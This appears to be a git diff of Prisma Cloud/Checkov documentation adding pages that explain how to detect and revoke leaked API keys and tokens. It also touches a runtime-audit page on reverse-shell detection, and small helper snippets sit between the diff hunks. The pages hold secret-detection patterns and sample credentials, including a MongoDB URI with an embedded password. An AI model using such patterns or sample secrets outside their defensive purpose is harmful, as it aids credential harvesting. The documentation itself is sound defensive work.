+| 6933e817-4991-4f9d-9bbf-b11bacfc8c29
+
+|Checkov Check ID
+|CKV_SECRET_66
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Splunk's Credential Management page enables storing credentials for scripted or modular inputs.
+Input configurations that reference credentials can use the credentials stored in Credential Management.
+Developers can store credentials such as usernames and passwords, or certificates used for authentication with third-party systems.
+Using this page to manage certificates that encrypt server-to-server communications is discouraged.
+
+=== Fix - Buildtime
+
+
+*Splunk*
+
+
+
+. On the Enterprise Security menu bar, select Configure > General > Credential Management.
+
+. In the Action column of a credential or certificate, click Delete.
+
+. Click OK to confirm.
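The point of Credential Management is to keep literal passwords out of `.conf` files. As a rough illustration only (not the actual Checkov pattern), a scan for plaintext `password =` values in a Splunk-style stanza could look like this; values beginning with Splunk's `$1$`/`$7$` encrypted-value prefixes are skipped:

```python
import re

# Flags literal password values; values starting with $<digit>$ are
# treated as Splunk-encrypted and skipped. Illustrative pattern only.
INLINE_PASSWORD = re.compile(r"^\s*password\s*=\s*(?!\$\d\$)\S+", re.MULTILINE)

conf = """
[my_scripted_input]
username = svc_account
password = hunter2
"""

assert INLINE_PASSWORD.search(conf) is not None
```

A hit means the stanza carries a plaintext secret that should instead be stored through Credential Management.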
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-67.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-67.adoc new file mode 100644 index 000000000..80d35cdb6 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-67.adoc @@ -0,0 +1,52 @@ +== Sumo Logic Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b5ba4ba2-8e01-4055-8086-e97a5ef5b598 + +|Checkov Check ID +|CKV_SECRET_67 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Sumo Logic Access Keys Management API allows developers to securely register new Collectors or access Sumo Logic APIs. +This API was built with OpenAPI. +Developers can generate client libraries in many languages and explore automated testing. + +=== Fix - Buildtime + + +*Sumo Logic* + + + +. If you have the Create Access Keys role capability, you can use the Preferences page to create access keys. ++ +You can use the Preferences page to edit, activate, deactivate, and delete your access keys. + +. When you mouse over an access key on the Preferences page, several controls appear. + +. Use the trash can icon to permanently remove the access key. ++ +The key will no longer be usable for API calls. ++ +However, deleting a key used to register a Collector does not affect the Collector, as the only time a Collector uses the access key is at installation. 
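Sumo Logic API requests authenticate with HTTP Basic auth built from the access ID / access key pair, which is why a leaked key grants API access until it is deleted. A small Python sketch of constructing that header (the credential values below are placeholders):

```python
import base64

def sumo_basic_auth(access_id: str, access_key: str) -> str:
    """Return the HTTP Basic Authorization header value for a
    Sumo Logic accessId/accessKey pair."""
    raw = f"{access_id}:{access_key}".encode()
    return "Basic " + base64.b64encode(raw).decode()

# Placeholder credentials for demonstration only.
header = sumo_basic_auth("suXXXXXXXX", "not-a-real-key")
```

Once the key is deleted on the Preferences page, any header built from it is rejected on the next API call.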
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-68.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-68.adoc
new file mode 100644
index 000000000..9b5724c94
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-68.adoc
@@ -0,0 +1,52 @@
+== Telegram Bot Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bbe5b7b7-00e1-4c4f-8838-02d913a3df11
+
+|Checkov Check ID
+|CKV_SECRET_68
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The Telegram Bot API is an HTTP-based interface created for developers keen on building bots for Telegram.
+
+=== Fix - Buildtime
+
+
+*Telegram*
+
+
+
+. Revoke the token
+
+. Go to Telegram
+
+. Click on BotFather
+
+. Type in "/mybots"
+
+. Select the bot that needs to be revoked
+
+. Click Edit and click Revoke
+
+. Monitor for abuse
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-69.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-69.adoc
new file mode 100644
index 000000000..746950dc2
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-69.adoc
@@ -0,0 +1,50 @@
+== Travis Personal Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9337a600-63d8-4b20-8492-6f6900ed2b6f
+
+|Checkov Check ID
+|CKV_SECRET_69
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Travis CI is a hosted CI service used to build and test software projects hosted on GitHub and Bitbucket.
+Travis CI was the first CI service to provide its services to open-source projects for free, and continues to do so.
+TravisPro provides custom deployments of a proprietary version on the customer's own hardware.
+
+=== Fix - Buildtime
+
+
+*Travis CI*
+
+
+
+. Revoke the token
+
+. Go to Travis CI and click on your avatar, then click on Settings
+
+. Click on the Tokens tab
+
+. Find the compromised token and click on the trash icon
+
+. Monitor for abuse
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-7.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-7.adoc
new file mode 100644
index 000000000..62c5d2c43
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-7.adoc
@@ -0,0 +1,54 @@
+== IBM Cloud IAM Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6174425e-9502-41f2-8256-09ea40ae4d2e
+
+|Checkov Check ID
+|CKV_SECRET_7
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The IBM Cloud Identity and Access Management (IAM) service manages keys that can give access to the infrastructure API and to resources.
+
+=== Fix - Buildtime
+
+
+*IBM Cloud*
+
+
+
+. Revoke the exposed secret.
++
+To delete an API key, complete the following steps:
+
+. In the console, go to Manage > Access (IAM) > API keys.
+
+. Identify the row of the API key that you want to delete, and select Delete from the Actions menu (list of actions icon).
+
+. Then, confirm the deletion by clicking Delete.
+
+. Clean the git history.
++
+Go to the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Check any relevant access logs to ensure the key was not utilized during the compromised period.
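IBM Cloud offers the API key for download as a JSON file containing an `apikey` field, which is one common way these keys end up committed. A rough pre-commit check, sketched in Python (illustrative only, not the Checkov implementation, and the sample key below is fake):

```python
import json
import re

def exposes_ibm_apikey(text: str) -> bool:
    """Return True if the text looks like a committed IBM Cloud API key
    file, i.e. JSON (or JSON-like text) carrying an "apikey" field."""
    try:
        doc = json.loads(text)
        return isinstance(doc, dict) and "apikey" in doc
    except ValueError:
        # Fall back to a loose textual check for non-JSON files.
        return re.search(r'"apikey"\s*:', text) is not None

sample = '{"name": "my-key", "apikey": "NotARealKey123"}'
assert exposes_ibm_apikey(sample)
```

Running a check like this before pushing complements the revoke-and-clean steps above.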
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-70.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-70.adoc
new file mode 100644
index 000000000..02168b6bc
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-70.adoc
@@ -0,0 +1,53 @@
+== Typeform API Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 4d0f2321-6866-4fa9-b57c-1d7db2801acb
+
+|Checkov Check ID
+|CKV_SECRET_70
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+To use the Typeform Create, Responses, and Webhooks APIs, you need to pass your personal access token in the Authorization header of your requests.
+Access tokens are long strings of random characters that look something like this: tfp_943af478d3ff3d4d760020c11af102b79c440513.
+The access token is unique per developer.
+It is used to identify a given user and make sure that only you can access your typeforms and results.
+
+=== Fix - Buildtime
+
+
+*Typeform*
+
+
+
+. Log in to your account at Typeform.
+
+. In the upper-left corner, in the drop-down menu next to your username, click Account.
+
+. In the left menu, click Personal tokens.
+
+. Identify the token you want to delete.
+
+. Click ..., the three dots button on the right side of the list.
+
+. Click Delete this token.
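Based on the sample token shown in the description (a `tfp_` prefix followed by a long run of token characters), a simplified detection pattern can be sketched in Python. This is an illustration inferred from that example, not the exact pattern the policy uses:

```python
import re

# Simplified pattern inferred from the documented example token.
TYPEFORM_TOKEN = re.compile(r"tfp_[A-Za-z0-9]{40,}")

# The sample token from the description above, hard-coded in a source line.
leaky_line = 'TOKEN = "tfp_943af478d3ff3d4d760020c11af102b79c440513"'
assert TYPEFORM_TOKEN.search(leaky_line) is not None

# Reading the token from the environment leaves nothing to match.
safe_line = 'TOKEN = os.environ["MY_ACCESS_TOKEN"]'
assert TYPEFORM_TOKEN.search(safe_line) is None
```

The contrast between the two lines is the whole fix: the token string itself should never appear in committed source.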
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-71.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-71.adoc
new file mode 100644
index 000000000..582e53a1c
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-71.adoc
@@ -0,0 +1,50 @@
+== Vault Unseal Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d29f067e-31c9-44a2-b4e0-90a25b8595e1
+
+|Checkov Check ID
+|CKV_SECRET_71
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+When a Vault server is started, it starts in a sealed state.
+In this state, Vault is configured to know where and how to access the physical storage, but doesn't know how to decrypt any of it.
+Unsealing is the process of obtaining the plaintext root key necessary to read the decryption key to decrypt the data, allowing access to the Vault.
+
+=== Fix - Buildtime
+
+
+*Vault*
+
+
+
+. Rotate the unseal keys
+
+. Connect to Vault
+
+. Run `vault operator rekey` and supply the required threshold of existing unseal keys to generate a replacement key set, invalidating the leaked key
+
+. Confirm the rekey completed with `vault operator rekey -status`
+
+. Monitor for abuse
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-72.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-72.adoc
new file mode 100644
index 000000000..40967b621
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-72.adoc
@@ -0,0 +1,46 @@
+== Yandex Predictor API key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 063f37de-6e7e-4d1f-8607-36502f9dfeaa
+
+|Checkov Check ID
+|CKV_SECRET_72
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Yandex Predictor is a machine learning service hosted by Yandex Cloud.
+The Yandex Predictor API Key is used to authenticate and authorize access to the API to add machine learning to services.
+
+=== Fix - Buildtime
+
+*Yandex Cloud*
+
+
+. In Yandex Cloud, go to Access Management
+
+. Click on API keys
+
+. Find the API key you want to revoke
+
+. Click on the three dot icon and select Delete
+
+. Track usage and set up alerts to spot any abuse of the credential
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-73.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-73.adoc
new file mode 100644
index 000000000..92ab54d28
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-73.adoc
@@ -0,0 +1,52 @@
+== Cloudflare API Credentials
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| fbf7538b-dd40-4afe-a27d-81e118980598
+
+|Checkov Check ID
+|CKV_SECRET_73
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Using the Cloudflare API requires authentication so that Cloudflare knows who is making requests and what permissions they have.
+An API Token can be created to grant access to the API to perform actions.
+See creating an API Token for more on this.
+When using the Cloudflare API, developers need to authenticate API requests.
+
+=== Fix - Buildtime
+
+
+*Cloudflare*
+
+
+
+[source,text]
+----
+curl -X DELETE \
+"https://api.cloudflare.com/client/v4/zones//filters?id=&id=" \
+-H "X-Auth-Email: " \
+-H "X-Auth-Key: "
+----
+
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-74.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-74.adoc
new file mode 100644
index 000000000..033670d74
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-74.adoc
@@ -0,0 +1,49 @@
+== Vercel API Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0e6cee83-8605-44a0-b53e-8410872d0cea
+
+|Checkov Check ID
+|CKV_SECRET_74
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Vercel Access Tokens are required to authenticate and use the Vercel API.
+Tokens can be created and managed inside your account settings, and can be scoped to only allow access for specific Teams.
+
+=== Fix - Buildtime
+
+
+*Vercel*
+
+
+
+. Revoke the key
+
+. On Vercel, click on the avatar, then Account
+
+. Click on API Tokens
+
+. Find the API Token you want to revoke and click on the trash icon
+
+. 
Monitor for abuse
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-75.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-75.adoc
new file mode 100644
index 000000000..97a9a6c77
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-75.adoc
@@ -0,0 +1,50 @@
+== Webflow API Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7fc2545b-e320-4d5c-900c-d9218fe286c3
+
+|Checkov Check ID
+|CKV_SECRET_75
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The Webflow CMS APIs let developers programmatically add, update, and delete items from Collections.
+Creating webhooks with the CMS API gets Webflow to "talk" to third-party applications.
+
+=== Fix - Buildtime
+
+
+*Webflow*
+
+
+
+. Revoke the token
+
+. Go to Webflow, click on your avatar
+
+. Click on the API Tokens tab
+
+. Find the token to revoke and click on the trash icon
+
+. Monitor for abuse
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-76.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-76.adoc
new file mode 100644
index 000000000..e9793f6fa
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-76.adoc
@@ -0,0 +1,50 @@
+== Scalr API Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6e65aa0b-c144-476e-90c4-1a8d1cd9e725
+
+|Checkov Check ID
+|CKV_SECRET_76
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Scalr is a remote operations backend for Terraform.
+It executes Terraform operations and stores state, regardless of the workflow, in Scalr itself, allowing for easy collaboration across your organization.
+That means you can easily onboard existing GitOps or native Terraform CLI based workflows into Scalr with little to no modification to your actual code.
+
+=== Fix - Buildtime
+
+
+*Scalr*
+
+
+
+. Revoke the token
+
+. Go to Scalr, click on Account
+
+. Click on API Tokens
+
+. Find the token to revoke and click on the trash icon
+
+. Monitor for abuse
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-77.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-77.adoc
new file mode 100644
index 000000000..165d14230
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-77.adoc
@@ -0,0 +1,44 @@
+== MongoDB Connection String
+
+
+=== Description
+
+MongoDB is a document-oriented database program.
+This policy detects MongoDB credentials in the form of URI connection strings.
+Example:
+
+
+[source,text]
+----
+var mongo_uri = "mongodb+srv://testuser:hub24aoeu@gg-is-awesome-gg273.mongodb.net/test?retryWrites=true&w=majority"
+----
+
+
+=== Fix - Buildtime
+
+
+*MongoDB*
+
+
+Revoking a MongoDB connection string means invalidating or disabling the credentials used to connect to a MongoDB instance.
+This can be done in several ways depending on the method used to authenticate and the specific setup of your MongoDB environment.
+If you're using MongoDB's built-in authentication mechanism, you can revoke a connection string by revoking the user's privileges.
+This can be done using the following steps:
+
+. Connect to the MongoDB instance using a user account with administrative privileges.
+
+. Use the db.revokeRolesFromUser() command to remove the user's roles.
++
+For example, if the user's name is myUser and they have the readWrite role on the myDatabase database, you would run the following command:
++
+[,javascript]
+----
+db.revokeRolesFromUser("myUser", [{role: "readWrite", db: "myDatabase"}])
+----
+
+. Alternatively, you can use the db.dropUser() command to completely delete the user account.
+If you're using an external authentication mechanism, such as LDAP or Kerberos, you'll need to consult the documentation for that mechanism to find out how to revoke credentials.
+It's worth noting that revoking a connection string is only effective for future connections.
+Any existing connections will remain valid until they are closed or expire.
+If you need to immediately terminate all active connections, you can restart the MongoDB instance or use the db.killOp() command to kill specific operations.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-8.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-8.adoc
new file mode 100644
index 000000000..bd43dcbb6
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-8.adoc
@@ -0,0 +1,49 @@
+== IBM COS HMAC Credentials
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 27e72b60-3741-4aed-8854-470fffaac08f
+
+|Checkov Check ID
+|CKV_SECRET_8
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+IBM Cloud Object Storage (COS) is a format for storing unstructured data in the cloud.
+HMAC credentials consist of an Access Key and Secret Key paired for use with S3-compatible tools and libraries that require authentication.
+The IBM Cloud Object Storage API is a REST-based API for reading and writing objects.
+It uses IBM Cloud Identity and Access Management for authentication and authorization, and supports a subset of the S3 API for easy migration of applications to IBM Cloud.
+
+=== Fix - Buildtime
+
+
+*IBM Cloud*
+
+
+
+. Revoke the exposed secret.
+
+. Clean the git history.
++
+Go to the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Check IBM Cloud Object Storage Accesser server logs to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-9.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-9.adoc
new file mode 100644
index 000000000..3365ba57f
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-9.adoc
@@ -0,0 +1,50 @@
+== JSON Web Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2d5ee856-a20a-4262-8c55-d60c09a33068
+
+|Checkov Check ID
+|CKV_SECRET_9
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+JSON Web Tokens are an open, industry-standard RFC 7519 method for representing claims securely between two parties.
+Once issued, access tokens and ID tokens cannot be revoked in the same way as cookies with session IDs for server-side sessions.
+As a result, tokens should be issued for relatively short periods, and then refreshed periodically if the user remains active.
+
+=== Fix - Buildtime
+
+
+*Multiple Services*
+
+
+
+. Reduce duration.
++
+The most common solution is to reduce the duration of the JWT and revoke the refresh token so that the user can't generate a new JWT.
+
+. Clean the git history.
++
+Go to the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Check your application access logs to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/secrets-policy-index.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/secrets-policy-index.adoc
new file mode 100644
index 000000000..62ff0f7fb
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/secrets-policy-index.adoc
@@ -0,0 +1,388 @@
+== Secrets Policy Index
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID|Severity
+
+|xref:ensure-repository-is-private.adoc[GitHub repository is not Private]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/PrivateRepo.py[CKV_GIT_1]
+|LOW
+
+
+|xref:git-secrets-1.adoc[Artifactory Credentials]
+|CKV_SECRET_1
+|LOW
+
+
+|xref:git-secrets-11.adoc[Mailchimp Access Key]
+|CKV_SECRET_11
+|LOW
+
+
+|xref:git-secrets-12.adoc[NPM Token]
+|CKV_SECRET_12
+|LOW
+
+
+|xref:git-secrets-13.adoc[Private Key]
+|CKV_SECRET_13
+|LOW
+
+
+|xref:git-secrets-14.adoc[Slack Token]
+|CKV_SECRET_14
+|LOW
+
+
+|xref:git-secrets-15.adoc[SoftLayer Credentials]
+|CKV_SECRET_15
+|LOW
+
+
+|xref:git-secrets-16.adoc[Square OAuth Secret]
+|CKV_SECRET_16
+|LOW
+
+
+|xref:git-secrets-17.adoc[Stripe Access Key]
+|CKV_SECRET_17
+|LOW
+
+
+|xref:git-secrets-18.adoc[Twilio Access Key]
+|CKV_SECRET_18
+|LOW
+
+
+|xref:git-secrets-19.adoc[Hex High Entropy String]
+|CKV_SECRET_19
+|LOW
+
+
+|xref:git-secrets-2.adoc[AWS Access Keys]
+|CKV_SECRET_2
+|LOW
+
+
+|xref:git-secrets-21.adoc[Airtable API Key]
+|CKV_SECRET_21
+|LOW
+
+
+|xref:git-secrets-22.adoc[Algolia Key]
+|CKV_SECRET_22
+|LOW
+
+
+|xref:git-secrets-23.adoc[Alibaba Cloud Keys]
+|CKV_SECRET_23
+|LOW
+
+
+|xref:git-secrets-24.adoc[Asana Key]
+|CKV_SECRET_24
+|LOW
+
+
+|xref:git-secrets-25.adoc[Atlassian Oauth2 Keys]
+|CKV_SECRET_25
+|LOW
+
+
+|xref:git-secrets-26.adoc[Auth0 Keys]
+|CKV_SECRET_26
+|LOW
+
+
+|xref:git-secrets-27.adoc[Bitbucket Keys]
+|CKV_SECRET_27
+|LOW
+
+
+|xref:git-secrets-28.adoc[Buildkite Agent Token] +|CKV_SECRET_28 +|LOW + + +|xref:git-secrets-29.adoc[CircleCI Personal Token] +|CKV_SECRET_29 +|LOW + + +|xref:git-secrets-3.adoc[Azure Storage Account Access Keys] +|CKV_SECRET_3 +|LOW + + +|xref:git-secrets-30.adoc[Codecov API key] +|CKV_SECRET_30 +|LOW + + +|xref:git-secrets-31.adoc[Coinbase Keys] +|CKV_SECRET_31 +|LOW + + +|xref:git-secrets-32.adoc[Confluent Keys] +|CKV_SECRET_32 +|LOW + + +|xref:git-secrets-33.adoc[Databricks Authentication Token] +|CKV_SECRET_33 +|LOW + + +|xref:git-secrets-34.adoc[DigitalOcean Token] +|CKV_SECRET_34 +|LOW + + +|xref:git-secrets-35.adoc[Discord Token] +|CKV_SECRET_35 +|LOW + + +|xref:git-secrets-36.adoc[Doppler API Key] +|CKV_SECRET_36 +|LOW + + +|xref:git-secrets-37.adoc[DroneCI Token] +|CKV_SECRET_37 +|LOW + + +|xref:git-secrets-38.adoc[Dropbox App Credentials] +|CKV_SECRET_38 +|LOW + + +|xref:git-secrets-39.adoc[Dynatrace token] +|CKV_SECRET_39 +|LOW + + +|xref:git-secrets-4.adoc[Basic Auth Credentials] +|CKV_SECRET_4 +|LOW + + +|xref:git-secrets-40.adoc[Elastic Email Key] +|CKV_SECRET_40 +|LOW + + +|xref:git-secrets-41.adoc[Fastly Personal Token] +|CKV_SECRET_41 +|LOW + + +|xref:git-secrets-42.adoc[FullStory API Key] +|CKV_SECRET_42 +|LOW + + +|xref:git-secrets-43.adoc[GitHub Token] +|CKV_SECRET_43 +|LOW + + +|xref:git-secrets-44.adoc[GitLab Token] +|CKV_SECRET_44 +|LOW + + +|xref:git-secrets-45.adoc[Google Cloud Keys] +|CKV_SECRET_45 +|LOW + + +|xref:git-secrets-46.adoc[Grafana Token] +|CKV_SECRET_46 +|LOW + + +|xref:git-secrets-47.adoc[Terraform Cloud API Token] +|CKV_SECRET_47 +|LOW + + +|xref:git-secrets-48.adoc[Heroku Platform Key] +|CKV_SECRET_48 +|LOW + + +|xref:git-secrets-49.adoc[HubSpot API Key] +|CKV_SECRET_49 +|LOW + + +|xref:git-secrets-5.adoc[Cloudant Credentials] +|CKV_SECRET_5 +|LOW + + +|xref:git-secrets-50.adoc[Intercom Access Token] +|CKV_SECRET_50 +|LOW + + +|xref:git-secrets-51.adoc[Jira Token] +|CKV_SECRET_51 +|LOW + + 
+|xref:git-secrets-52.adoc[LaunchDarkly Personal Token] +|CKV_SECRET_52 +|LOW + + +|xref:git-secrets-53.adoc[Netlify Token] +|CKV_SECRET_53 +|LOW + + +|xref:git-secrets-54.adoc[New Relic Key] +|CKV_SECRET_54 +|LOW + + +|xref:git-secrets-55.adoc[Notion Integration Token] +|CKV_SECRET_55 +|LOW + + +|xref:git-secrets-56.adoc[Okta Token] +|CKV_SECRET_56 +|LOW + + +|xref:git-secrets-57.adoc[PagerDuty Authorization Token] +|CKV_SECRET_57 +|LOW + + +|xref:git-secrets-58.adoc[PlanetScale Token] +|CKV_SECRET_58 +|LOW + + +|xref:git-secrets-59.adoc[Postman API Key] +|CKV_SECRET_59 +|LOW + + +|xref:git-secrets-6.adoc[Base64 High Entropy Strings] +|CKV_SECRET_6 +|LOW + + +|xref:git-secrets-60.adoc[Pulumi Access Token] +|CKV_SECRET_60 +|LOW + + +|xref:git-secrets-61.adoc[Python Package Index Key] +|CKV_SECRET_61 +|LOW + + +|xref:git-secrets-62.adoc[RapidAPI Key] +|CKV_SECRET_62 +|LOW + + +|xref:git-secrets-63.adoc[Readme API Key] +|CKV_SECRET_63 +|LOW + + +|xref:git-secrets-64.adoc[RubyGems API Key] +|CKV_SECRET_64 +|LOW + + +|xref:git-secrets-65.adoc[Sentry Token] +|CKV_SECRET_65 +|LOW + + +|xref:git-secrets-66.adoc[Splunk User Credentials] +|CKV_SECRET_66 +|LOW + + +|xref:git-secrets-67.adoc[Sumo Logic Keys] +|CKV_SECRET_67 +|LOW + + +|xref:git-secrets-68.adoc[Telegram Bot Token] +|CKV_SECRET_68 +|LOW + + +|xref:git-secrets-69.adoc[Travis Personal Token] +|CKV_SECRET_69 +|LOW + + +|xref:git-secrets-7.adoc[IBM Cloud IAM Key] +|CKV_SECRET_7 +|LOW + + +|xref:git-secrets-70.adoc[Typeform API Token] +|CKV_SECRET_70 +|LOW + + +|xref:git-secrets-71.adoc[Vault Unseal Key] +|CKV_SECRET_71 +|LOW + + +|xref:git-secrets-72.adoc[Yandex Predictor API key] +|CKV_SECRET_72 +|LOW + + +|xref:git-secrets-73.adoc[Cloudflare API Credentials] +|CKV_SECRET_73 +|LOW + + +|xref:git-secrets-74.adoc[Vercel API Token] +|CKV_SECRET_74 +|LOW + + +|xref:git-secrets-75.adoc[Webflow API Token] +|CKV_SECRET_75 +|LOW + + +|xref:git-secrets-76.adoc[Scalr API Token] +|CKV_SECRET_76 +|LOW + + 
+|xref:git-secrets-77.adoc[MongoDB Connection String] +|Not Supported +| + + +|xref:git-secrets-8.adoc[IBM COS HMAC Credentials] +|CKV_SECRET_8 +|LOW + +|xref:git-secrets-9.adoc[JSON Web Token] +|CKV_SECRET_9 +|LOW + + +|=== + diff --git a/compute/admin_guide/api/api.adoc b/compute/admin_guide/api/api.adoc index 44356bba4..e54667412 100644 --- a/compute/admin_guide/api/api.adoc +++ b/compute/admin_guide/api/api.adoc @@ -2,10 +2,16 @@ All information for the CWPP API has now moved to https://pan.dev[pan.dev], our home for developer docs. -*API reference:* - +ifdef::compute_edition[] +* *Prisma Cloud Compute Edition API reference* ++ https://pan.dev/compute/api/ +endif::compute_edition[] -*API-related documentation, including the porting guide:* - -https://pan.dev/docs/prisma-cloud/docs/ +ifdef::prisma_cloud[] +* *Prisma Cloud Enterprise Edition API reference* ++ +https://pan.dev/prisma-cloud/api/cwpp/ +* *API workflows* +https://pan.dev/prisma-cloud/docs/ +endif::prisma_cloud[] diff --git a/compute/admin_guide/runtime_defense/runtime_audits.adoc b/compute/admin_guide/runtime_defense/runtime_audits.adoc index b94d73690..904c79dee 100644 --- a/compute/admin_guide/runtime_defense/runtime_audits.adoc +++ b/compute/admin_guide/runtime_defense/runtime_audits.adoc @@ -110,14 +110,14 @@ Hosts * Enable and disable this detection via the *Reverse shell attacks* toggle, under the Runtime rule Processes / Anti-malware tab. * Avoid audits on specific known and allowed processes, by adding process names to the runtime rules processes *Allowed* list. -| is a reverse shell . Full command: +| is a reverse shell. Full command: |xref:incident_types/reverse_shell.adoc[Reverse shell] | Containers, Hosts |Suid Binaries -|Indicates that a process is running with high priviliges, by watching for binaries with the setuid bit that are executed. +|Indicates that a process is running with high privileges, by watching for binaries with the setuid bit that are executed. 
